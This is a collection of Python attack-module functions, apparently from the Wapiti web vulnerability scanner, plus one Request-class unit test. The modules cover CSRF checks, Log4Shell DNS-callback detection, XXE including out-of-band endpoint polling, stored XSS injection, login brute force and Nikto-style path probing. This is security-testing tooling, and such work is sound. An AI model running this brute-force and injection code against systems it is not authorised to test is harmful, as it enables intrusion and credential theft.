async def attack(self, request: Request): csrf_value = self.is_csrf_present(request) # check if token is present if not csrf_value: vuln_message = _("Lack of anti CSRF token") elif not await self.is_csrf_verified(request): vuln_message = _( "CSRF token '{}' is not properly checked in backend").format( self.csrf_string) elif not self.is_csrf_robust(csrf_value): vuln_message = _( "CSRF token '{}' might be easy to predict").format( self.csrf_string) else: return self.already_vulnerable.append((request.url, request.post_keys)) self.log_red("---") self.log_red(vuln_message) self.log_red(request.http_repr()) self.log_red("---") await self.add_vuln_medium(request_id=request.path_id, category=NAME, request=request, info=vuln_message)
def is_csrf_verified(self, original_request: Request): """Check whether anti-csrf token is verified (backend) after submitting request""" # Replace anti-csrf token value from form with "wapiti" mutated_post_params = [ param if param[0] != self.csrf_string else [self.csrf_string, "wapiti"] for param in original_request.post_params ] # Replace anti-csrf token value from headers with "wapiti" special_headers = {} if original_request.headers and self.csrf_string in original_request.headers: special_headers[self.csrf_string] = "wapiti" mutated_request = Request(path=original_request.path, method=original_request.method, get_params=original_request.get_params, post_params=mutated_post_params, file_params=original_request.file_params, referer=original_request.referer, link_depth=original_request.link_depth) original_response = self.crawler.send(original_request, follow_redirects=True) try: mutated_response = self.crawler.send(mutated_request, headers=special_headers, follow_redirects=True) except ReadTimeout: self.log_orange("---") self.log_orange(Anomaly.MSG_TIMEOUT, original_request.path) self.log_orange(Anomaly.MSG_EVIL_REQUEST) self.log_orange(mutated_request.http_repr()) self.log_orange("---") anom_msg = Anomaly.MSG_PARAM_TIMEOUT.format(self.csrf_string) self.add_anom( request_id=original_request.path_id, category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=mutated_request, info=anom_msg, ) else: return not self.is_same_response(original_response, mutated_response) return True
async def _verify_url_vulnerability(self, request: Request, param_uuid: uuid.UUID): if not await self._verify_dns(str(param_uuid)): return await self.add_vuln_critical( category=NAME, request=request, info=_("URL {0} seems vulnerable to Log4Shell attack") \ .format(request.url), parameter="", wstg=WSTG_CODE ) log_red("---") log_red(_("URL {0} seems vulnerable to Log4Shell attack"), request.url) log_red(request.http_repr()) log_red("---")
async def _verify_header_vulnerability(self, modified_request: Request, header: str, payload: str, unique_id: uuid.UUID): if await self._verify_dns(str(unique_id)) is True: await self.add_vuln_critical( category=NAME, request=modified_request, info=_("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}") \ .format(modified_request.url, "header", header), parameter=f"{header}: {payload}", wstg=WSTG_CODE ) log_red("---") log_red( _("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}" ), modified_request.url, "header", header) log_red(modified_request.http_repr()) log_red("---")
def attack_body(self, original_request): for payload, tags in self.payloads: payload = payload.replace("[PATH_ID]", str(original_request.path_id)) payload = payload.replace("[PARAM_AS_HEX]", "72617720626f6479") # raw body mutated_request = Request(original_request.url, method="POST", enctype="text/xml", post_params=payload) if self.verbose == 2: print("[¨] {0}".format(mutated_request)) try: response = self.crawler.send(mutated_request) except RequestException: self.network_errors += 1 continue else: pattern = search_pattern(response.content, self.flag_to_patterns(tags)) if pattern and not self.false_positive(original_request, pattern): self.add_vuln( request_id=original_request.path_id, category=NAME, level=HIGH_LEVEL, request=mutated_request, info="XXE vulnerability leading to file disclosure", parameter="raw body") self.log_red("---") self.log_red("{0} in {1} leading to file disclosure", self.MSG_VULN, original_request.url) self.log_red(Messages.MSG_EVIL_REQUEST) self.log_red(mutated_request.http_repr()) self.log_red("---") self.vulnerables.add(original_request.path_id) break
async def _verify_param_vulnerability(self, request: Request, param_uuid: uuid.UUID, param_name: str): if not await self._verify_dns(str(param_uuid)): return element_type = "query parameter" if request.method == "GET" else "body parameter" await self.add_vuln_critical( category=NAME, request=request, info=_("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}") \ .format(request.url, element_type, param_name), parameter=f"{param_name}", wstg=WSTG_CODE ) log_red("---") log_red( _("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}" ), request.url, element_type, param_name) log_red(request.http_repr()) log_red("---")
async def attack_body(self, original_request): for payload, tags in self.payloads: payload = payload.replace("[PATH_ID]", str(original_request.path_id)) payload = payload.replace("[PARAM_AS_HEX]", "72617720626f6479") # raw body mutated_request = Request(original_request.url, method="POST", enctype="text/xml", post_params=payload) log_verbose(f"[¨] {mutated_request}") try: response = await self.crawler.async_send(mutated_request) except RequestError: self.network_errors += 1 continue else: pattern = search_pattern(response.content, self.flag_to_patterns(tags)) if pattern and not await self.false_positive( original_request, pattern): await self.add_vuln_high( request_id=original_request.path_id, category=NAME, request=mutated_request, info="XXE vulnerability leading to file disclosure", parameter="raw body", wstg=WSTG_CODE) log_red("---") log_red("{0} in {1} leading to file disclosure", self.MSG_VULN, original_request.url) log_red(Messages.MSG_EVIL_REQUEST) log_red(mutated_request.http_repr()) log_red("---") self.vulnerables.add(original_request.path_id) break
async def attack(self, request: Request): """This method searches XSS which could be permanently stored in the web application""" url = request.url target_req = Request(url) referer = request.referer headers = {} if referer: headers["referer"] = referer try: response = await self.crawler.async_send(target_req, headers=headers) data = response.content except RequestError: self.network_errors += 1 return # Should we look for taint codes sent with GET in the webpages? # Exploiting those may imply sending more GET requests # Search in the page source for every taint code used by mod_xss for taint in self.tried_xss: input_request = self.tried_xss[taint][0] # Such situations should not occur as it would be stupid to block POST (or GET) requests for mod_xss # and not mod_permanentxss, but it is possible so let's filter that. if not self.do_get and input_request.method == "GET": continue if not self.do_post and input_request.method == "POST": continue if taint.lower() in data.lower(): # Code found in the webpage ! # Did mod_xss saw this as a reflected XSS ? if taint in self.successful_xss: # Yes, it means XSS payloads were injected, not just tainted code. payload, flags = self.successful_xss[taint] if self.check_payload(response, flags, taint): # If we can find the payload again, this is in fact a stored XSS get_params = input_request.get_params post_params = input_request.post_params file_params = input_request.file_params referer = input_request.referer # The following trick may seems dirty but it allows to treat GET and POST requests # the same way. for params_list in [ get_params, post_params, file_params ]: for i, __ in enumerate(params_list): parameter, value = params_list[i] parameter = quote(parameter) if value != taint: continue if params_list is file_params: params_list[i][1][0] = payload else: params_list[i][1] = payload # we found the xss payload again -> stored xss vuln evil_request = Request( input_request.path, method=input_request.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer) if request.path == input_request.path: description = _( "Permanent XSS vulnerability found via injection in the parameter {0}" ).format(parameter) else: description = _( "Permanent XSS vulnerability found in {0} by injecting" " the parameter {1} of {2}").format( request.url, parameter, input_request.path) if has_strong_csp(response): description += ".\n" + _( "Warning: Content-Security-Policy is present!" ) await self.add_vuln_high( request_id=request.path_id, category=NAME, request=evil_request, parameter=parameter, info=description) if parameter == "QUERY_STRING": injection_msg = Messages.MSG_QS_INJECT else: injection_msg = Messages.MSG_PARAM_INJECT self.log_red("---") self.log_red(injection_msg, self.MSG_VULN, request.path, parameter) if has_strong_csp(response): self.log_red( _("Warning: Content-Security-Policy is present!" )) self.log_red(Messages.MSG_EVIL_REQUEST) self.log_red(evil_request.http_repr()) self.log_red("---") # FIX: search for the next code in the webpage # Ok the content is stored, but will we be able to inject javascript? else: parameter = self.tried_xss[taint][1] payloads = generate_payloads(response.content, taint, self.PAYLOADS_FILE, self.external_endpoint) flags = self.tried_xss[taint][2] # TODO: check that and make it better if flags.method == PayloadType.get: method = "G" elif flags.method == PayloadType.file: method = "F" else: method = "P" await self.attempt_exploit(method, payloads, input_request, parameter, taint, request)
async def attack(self, request: Request): try: page = await self.crawler.async_get(Request(request.referer), follow_redirects=True) except RequestError: self.network_errors += 1 return login_form, username_field_idx, password_field_idx = page.find_login_form( ) if not login_form: return try: failure_text = await self.send_credentials(login_form, username_field_idx, password_field_idx, "invalid", "invalid") if self.check_success_auth(failure_text): # Ignore this case as it raises false positives return except RequestError: self.network_errors += 1 return tasks = set() pending_count = 0 found = False creds_iterator = product(self.get_usernames(), self.get_passwords()) while True: if pending_count < self.options[ "tasks"] and not self._stop_event.is_set() and not found: try: username, password = next(creds_iterator) except StopIteration: pass else: task = asyncio.create_task( self.test_credentials(login_form, username_field_idx, password_field_idx, username, password, failure_text)) tasks.add(task) if not tasks: break done_tasks, pending_tasks = await asyncio.wait( tasks, timeout=0.01, return_when=asyncio.FIRST_COMPLETED) pending_count = len(pending_tasks) for task in done_tasks: try: result = await task except RequestError: self.network_errors += 1 else: if result: found = True username, password = result vuln_message = _( "Credentials found for URL {} : {} / {}").format( request.referer, username, password) # Recreate the request that succeed in order to print and store it post_params = login_form.post_params get_params = login_form.get_params if login_form.method == "POST": post_params[username_field_idx][1] = username post_params[password_field_idx][1] = password else: get_params[username_field_idx][1] = username get_params[password_field_idx][1] = password evil_request = Request( path=login_form.url, method=login_form.method, post_params=post_params, get_params=get_params, referer=login_form.referer, link_depth=login_form.link_depth) await self.add_vuln_low(request_id=request.path_id, category=NAME, request=evil_request, info=vuln_message, wstg=WSTG_CODE) log_red("---") log_red(vuln_message) log_red(Messages.MSG_EVIL_REQUEST) log_red(evil_request.http_repr()) log_red("---") tasks.remove(task) if self._stop_event.is_set() or found: # If we found valid credentials we need to stop pending tasks as they may generate false positives # because the session is opened on the website and next attempts may appear as logged in for task in pending_tasks: task.cancel() tasks.remove(task)
def finish(self): endpoint_url = "{}get_xxe.php?session_id={}".format( self.internal_endpoint, self._session_id) print( _("[*] Asking endpoint URL {} for results, please wait...").format( endpoint_url)) sleep(2) # A la fin des attaques on questionne le endpoint pour savoir s'il a été contacté endpoint_request = Request(endpoint_url) try: response = self.crawler.send(endpoint_request) except RequestException: self.network_errors += 1 print( _("[!] Unable to request endpoint URL '{}'").format( self.internal_endpoint)) return data = response.json if not isinstance(data, dict): return for request_id in data: original_request = self.persister.get_path_by_id(request_id) if original_request is None: continue # raise ValueError("Could not find the original request with ID {}".format(request_id)) page = original_request.path for hex_param in data[request_id]: parameter = unhexlify(hex_param).decode("utf-8") for infos in data[request_id][hex_param]: request_url = infos["url"] # Date in ISO format request_date = infos["date"] request_ip = infos["ip"] request_size = infos["size"] payload_name = infos["payload"] if parameter == "QUERY_STRING": vuln_message = Messages.MSG_QS_INJECT.format( self.MSG_VULN, page) elif parameter == "raw body": vuln_message = _( "Out-Of-Band {0} by sending raw XML in request body" ).format(self.MSG_VULN) else: vuln_message = _( "Out-Of-Band {0} via injection in the parameter {1}" ).format(self.MSG_VULN, parameter) more_infos = _( "The target sent {0} bytes of data to the endpoint at {1} with IP {2}.\n" "Received data can be seen at {3}.").format( request_size, request_date, request_ip, request_url) vuln_message += "\n" + more_infos # placeholder if shit happens payload = ( "<xml>" "See https://phonexicum.github.io/infosec/xxe.html#attack-vectors" "</xml>") for payload, flags in self.payloads: if "{}.dtd".format(payload_name) in payload: payload = payload.replace( "[PATH_ID]", str(original_request.path_id)) payload = payload.replace("[PARAM_AS_HEX]", "72617720626f6479") break if parameter == "raw body": mutated_request = Request(original_request.path, method="POST", enctype="text/xml", post_params=payload) elif parameter == "QUERY_STRING": mutated_request = Request("{}?{}".format( original_request.path, quote(payload)), method="GET") elif parameter in original_request.get_keys or parameter in original_request.post_keys: mutator = Mutator( methods="G" if original_request.method == "GET" else "P", payloads=[(payload, Flags())], qs_inject=self.must_attack_query_string, parameters=[parameter], skip=self.options.get("skipped_parameters")) mutated_request, __, __, __ = next( mutator.mutate(original_request)) else: mutator = FileMutator( payloads=[(payload, Flags())], parameters=[parameter], skip=self.options.get("skipped_parameters")) mutated_request, __, __, __ = next( mutator.mutate(original_request)) self.add_vuln(request_id=original_request.path_id, category=NAME, level=HIGH_LEVEL, request=mutated_request, info=vuln_message, parameter=parameter) self.log_red("---") self.log_red(vuln_message) self.log_red(Messages.MSG_EVIL_REQUEST) self.log_red(mutated_request.http_repr()) self.log_red("---")
async def attack(self, request: Request): try: with open(os.path.join(self.user_config_dir, self.NIKTO_DB)) as nikto_db_file: reader = csv.reader(nikto_db_file) self.nikto_db = [ line for line in reader if line != [] and line[0].isdigit() ] except IOError: logging.warning(_("Problem with local nikto database.")) logging.info(_("Downloading from the web...")) await self.update() self.finished = True junk_string = "w" + "".join([ random.choice("0123456789abcdefghjijklmnopqrstuvwxyz") for __ in range(0, 5000) ]) root_url = request.url parts = urlparse(root_url) for line in self.nikto_db: if self._stop_event.is_set(): break match = match_or = match_and = False fail = fail_or = False osv_id = line[1] path = line[3] method = line[4] vuln_desc = line[10] post_data = line[11] path = path.replace("@CGIDIRS", "/cgi-bin/") path = path.replace("@ADMIN", "/admin/") path = path.replace("@NUKE", "/modules/") path = path.replace("@PHPMYADMIN", "/phpMyAdmin/") path = path.replace("@POSTNUKE", "/postnuke/") path = re.sub(r"JUNK\((\d+)\)", lambda x: junk_string[:int(x.group(1))], path) if path[0] == "@": continue if not path.startswith("/"): path = "/" + path try: url = f"{parts.scheme}://{parts.netloc}{path}" except UnicodeDecodeError: continue if method == "GET": evil_request = Request(url) elif method == "POST": evil_request = Request(url, post_params=post_data, method=method) else: evil_request = Request(url, post_params=post_data, method=method) if self.verbose == 2: if method == "GET": logging.info("[¨] {0}".format(evil_request.url)) else: logging.info("[¨] {0}".format(evil_request.http_repr())) try: response = await self.crawler.async_send(evil_request) except RequestError: self.network_errors += 1 continue except ValueError: # ValueError raised by urllib3 (Method cannot contain non-token characters), we don't want to raise continue page = response.content code = response.status raw = " ".join([x + ": " + y for x, y in response.headers.items()]) raw += page # First condition (match) if len(line[5]) == 3 and line[5].isdigit(): if code == int(line[5]): match = True else: if line[5] in raw: match = True # Second condition (or) if line[6] != "": if len(line[6]) == 3 and line[6].isdigit(): if code == int(line[6]): match_or = True else: if line[6] in raw: match_or = True # Third condition (and) if line[7] != "": if len(line[7]) == 3 and line[7].isdigit(): if code == int(line[7]): match_and = True else: if line[7] in raw: match_and = True else: match_and = True # Fourth condition (fail) if line[8] != "": if len(line[8]) == 3 and line[8].isdigit(): if code == int(line[8]): fail = True else: if line[8] in raw: fail = True # Fifth condition (or) if line[9] != "": if len(line[9]) == 3 and line[9].isdigit(): if code == int(line[9]): fail_or = True else: if line[9] in raw: fail_or = True if ((match or match_or) and match_and) and not (fail or fail_or): self.log_red("---") self.log_red(vuln_desc) self.log_red(url) refs = [] if osv_id != "0": refs.append("https://vulners.com/osvdb/OSVDB:" + osv_id) # CERT cert_advisory = re.search("(CA-[0-9]{4}-[0-9]{2})", vuln_desc) if cert_advisory is not None: refs.append("http://www.cert.org/advisories/" + cert_advisory.group(0) + ".html") # SecurityFocus securityfocus_bid = re.search("BID-([0-9]{4})", vuln_desc) if securityfocus_bid is not None: refs.append("http://www.securityfocus.com/bid/" + securityfocus_bid.group(1)) # Mitre.org mitre_cve = re.search("((CVE|CAN)-[0-9]{4}-[0-9]{4,})", vuln_desc) if mitre_cve is not None: refs.append( "http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + mitre_cve.group(0)) # CERT Incidents cert_incident = re.search("(IN-[0-9]{4}-[0-9]{2})", vuln_desc) if cert_incident is not None: refs.append("http://www.cert.org/incident_notes/" + cert_incident.group(0) + ".html") # Microsoft Technet ms_bulletin = re.search("(MS[0-9]{2}-[0-9]{3})", vuln_desc) if ms_bulletin is not None: refs.append( "http://www.microsoft.com/technet/security/bulletin/" + ms_bulletin.group(0) + ".asp") info = vuln_desc if refs: self.log_red(_("References:")) self.log_red(" {0}".format("\n ".join(refs))) info += "\n" + _("References:") + "\n" info += "\n".join(refs) self.log_red("---") await self.add_vuln_high(category=NAME, request=evil_request, info=info)
async def attack(self, request: Request): try: page = await self.crawler.async_get(Request(request.referer), follow_redirects=True) except RequestError: self.network_errors += 1 return login_form, username_field_idx, password_field_idx = page.find_login_form( ) if not login_form: return try: failure_text = await self.test_credentials(login_form, username_field_idx, password_field_idx, "invalid", "invalid") if self.check_success_auth(failure_text): # Ignore this case as it raises false positives return except RequestError: self.network_errors += 1 return for username, password in product(self.get_usernames(), self.get_passwords()): if self._stop_event.is_set(): break try: response = await self.test_credentials(login_form, username_field_idx, password_field_idx, username, password) except RequestError: self.network_errors += 1 continue if self.check_success_auth(response) and failure_text != response: vuln_message = _( "Credentials found for URL {} : {} / {}").format( request.referer, username, password) # Recreate the request that succeed in order to print and store it post_params = login_form.post_params get_params = login_form.get_params if login_form.method == "POST": post_params[username_field_idx][1] = username post_params[password_field_idx][1] = password else: get_params[username_field_idx][1] = username get_params[password_field_idx][1] = password evil_request = Request(path=login_form.url, method=login_form.method, post_params=post_params, get_params=get_params, referer=login_form.referer, link_depth=login_form.link_depth) await self.add_vuln_low(request_id=request.path_id, category=NAME, request=evil_request, info=vuln_message) self.log_red("---") self.log_red(vuln_message) self.log_red(Messages.MSG_EVIL_REQUEST) self.log_red(evil_request.http_repr()) self.log_red("---") break
async def test_request_object(): res1 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res2 = Request("http://httpbin.org/post?var1=a&var2=z", post_params=[['post1', 'c'], ['post2', 'd']]) res3 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'z']]) res4 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res5 = Request("http://httpbin.org/post?var1=z&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res6 = Request("http://httpbin.org/post?var3=z&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res7 = Request("http://httpbin.org/post?var1=z&var2=b&var4=e", post_params=[['post1', 'c'], ['post2', 'd']]) res8 = Request("http://httpbin.org/post?var2=d&var1=z", post_params=[['post1', 'c'], ['post2', 'd']]) res10 = Request("http://httpbin.org/post?qs0", post_params=[['post1', 'c'], ['post2', 'd']]) res11 = Request("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']]) res12 = Request("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']], file_params=[['file1', ('fname1', 'content')], ['file2', ('fname2', 'content')]]) res13 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/videos") res14 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/") res15 = Request("https://duckduckgo.com/") res16 = Request("https://duckduckgo.com/", post_params=[['q', 'Kung Fury']]) res17 = Request("http://example.com:8080/dir/?x=3") res18 = Request("http://httpbin.org/get?a=1", get_params=[['get1', 'c'], ['get2', 'd']]) assert res1 < res2 assert res2 > res3 assert res1 < res3 assert res1 == res4 assert hash(res1) == hash(res4) res4.link_depth = 5 assert hash(res1) == hash(res4) assert res1 != res2 assert res2 >= res1 assert res1 <= res3 assert res13.file_name == "videos" assert res10.path == "http://httpbin.org/post" assert res10.file_name == "post" # This one is important as it could break attacks on query string assert res10.url == "http://httpbin.org/post?qs0" assert res13.parent_dir == res14.url assert res15.is_root assert res15.parent_dir == res15.url assert res13.dir_name == res14.url assert res14.dir_name == res14.url assert res15.dir_name == res15.url assert res15 != res16 query_list = [res15] assert res16 not in query_list assert res17.dir_name == "http://example.com:8080/dir/" assert res18.url == "http://httpbin.org/get?get1=c&get2=d" assert res17.hostname == "example.com:8080" assert res1.encoded_get_keys == res8.encoded_get_keys assert res17.encoded_get_keys == "x" assert res16.encoded_get_keys == "" assert res12.parameters_count == 5 assert res12.encoded_get_keys == "qs1" assert res5.hash_params == res8.hash_params assert res7.hash_params != res8.hash_params assert res6 in [res6, res11] assert res6 not in [res11, None] assert res11 in [res6, res11] assert res11 not in [None, res6] print("Tests were successful, now launching representations") print("=== Basic representation follows ===") print(res1) print("=== cURL representation follows ===") print(res1.curl_repr) print("=== HTTP representation follows ===") print(res1.http_repr()) print("=== POST parameters as an array ===") print(res1.post_params) print("=== POST keys encoded as string ===") print(res1.encoded_post_keys) print("=== Upload HTTP representation ===") print(res12.http_repr()) print("=== Upload basic representation ===") print(res12) print("=== Upload cURL representation ===") print(res12.curl_repr) print("=== HTTP GET keys as a tuple ===") print(res1.get_keys) print("=== HTTP POST keys as a tuple ===") print(res1.post_keys) print("=== HTTP files keys as a tuple ===") print(res12.file_keys) print('') json_req = Request("http://httpbin.org/post?a=b", post_params=json.dumps({ "z": 1, "a": 2 }), enctype="application/json") crawler = AsyncCrawler("http://httpbin.org/") page = await crawler.async_send(json_req) assert page.json["json"] == {"z": 1, "a": 2} assert page.json["headers"]["Content-Type"] == "application/json" assert page.json["form"] == {} page = await crawler.async_send(res12) assert page.json["files"] res19 = Request("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']], file_params=[['file1', ('fname1', 'content')], ['file2', ('fname2', 'content')]], enctype="multipart/form-data") page = await crawler.async_send(res19) assert page.json["files"] await crawler.close()
def attack(self, request: Request): self.finished = True junk_string = "w" + "".join([ random.choice("0123456789abcdefghjijklmnopqrstuvwxyz") for __ in range(0, 5000) ]) urls = self.persister.get_links( attack_module=self.name) if self.do_get else [] server = next(urls).hostname for line in self.nikto_db: match = match_or = match_and = False fail = fail_or = False osv_id = line[1] path = line[3] method = line[4] vuln_desc = line[10] post_data = line[11] path = path.replace("@CGIDIRS", "/cgi-bin/") path = path.replace("@ADMIN", "/admin/") path = path.replace("@NUKE", "/modules/") path = path.replace("@PHPMYADMIN", "/phpMyAdmin/") path = path.replace("@POSTNUKE", "/postnuke/") path = re.sub(r"JUNK\((\d+)\)", lambda x: junk_string[:int(x.group(1))], path) if path[0] == "@": continue if not path.startswith("/"): path = "/" + path try: url = "http://" + server + path except UnicodeDecodeError: continue if method == "GET": evil_request = Request(url) elif method == "POST": evil_request = Request(url, post_params=post_data, method=method) else: evil_request = Request(url, post_params=post_data, method=method) if self.verbose == 2: if method == "GET": print("[¨] {0}".format(evil_request.url)) else: print("[¨] {0}".format(evil_request.http_repr())) try: response = self.crawler.send(evil_request) except RequestException: self.network_errors += 1 continue except ValueError: # ValueError raised by urllib3 (Method cannot contain non-token characters), we don't want to raise continue page = response.content code = response.status raw = " ".join([x + ": " + y for x, y in response.headers.items()]) raw += page # First condition (match) if len(line[5]) == 3 and line[5].isdigit(): if code == int(line[5]): match = True else: if line[5] in raw: match = True # Second condition (or) if line[6] != "": if len(line[6]) == 3 and line[6].isdigit(): if code == int(line[6]): match_or = True else: if line[6] in raw: match_or = True # Third condition (and) if line[7] != "": if len(line[7]) == 3 and line[7].isdigit(): if code == int(line[7]): match_and = True else: if line[7] in raw: match_and = True else: match_and = True # Fourth condition (fail) if line[8] != "": if len(line[8]) == 3 and line[8].isdigit(): if code == int(line[8]): fail = True else: if line[8] in raw: fail = True # Fifth condition (or) if line[9] != "": if len(line[9]) == 3 and line[9].isdigit(): if code == int(line[9]): fail_or = True else: if line[9] in raw: fail_or = True if ((match or match_or) and match_and) and not (fail or fail_or): self.log_red("---") self.log_red(vuln_desc) self.log_red(url) refs = [] if osv_id != "0": refs.append("https://vulners.com/osvdb/OSVDB:" + osv_id) # CERT cert_advisory = re.search("(CA-[0-9]{4}-[0-9]{2})", vuln_desc) if cert_advisory is not None: refs.append("http://www.cert.org/advisories/" + cert_advisory.group(0) + ".html") # SecurityFocus securityfocus_bid = re.search("BID-([0-9]{4})", vuln_desc) if securityfocus_bid is not None: refs.append("http://www.securityfocus.com/bid/" + securityfocus_bid.group(1)) # Mitre.org mitre_cve = re.search("((CVE|CAN)-[0-9]{4}-[0-9]{4,})", vuln_desc) if mitre_cve is not None: refs.append( "http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + mitre_cve.group(0)) # CERT Incidents cert_incident = re.search("(IN-[0-9]{4}-[0-9]{2})", vuln_desc) if cert_incident is not None: refs.append("http://www.cert.org/incident_notes/" + cert_incident.group(0) + ".html") # Microsoft Technet ms_bulletin = re.search("(MS[0-9]{2}-[0-9]{3})", vuln_desc) if ms_bulletin is not None: refs.append( "http://www.microsoft.com/technet/security/bulletin/" + ms_bulletin.group(0) + ".asp") info = vuln_desc if refs: self.log_red(_("References:")) self.log_red(" {0}".format("\n ".join(refs))) info += "\n" + _("References:") + "\n" info += "\n".join(refs) self.log_red("---") self.add_vuln(category=NAME, level=HIGH_LEVEL, request=evil_request, info=info)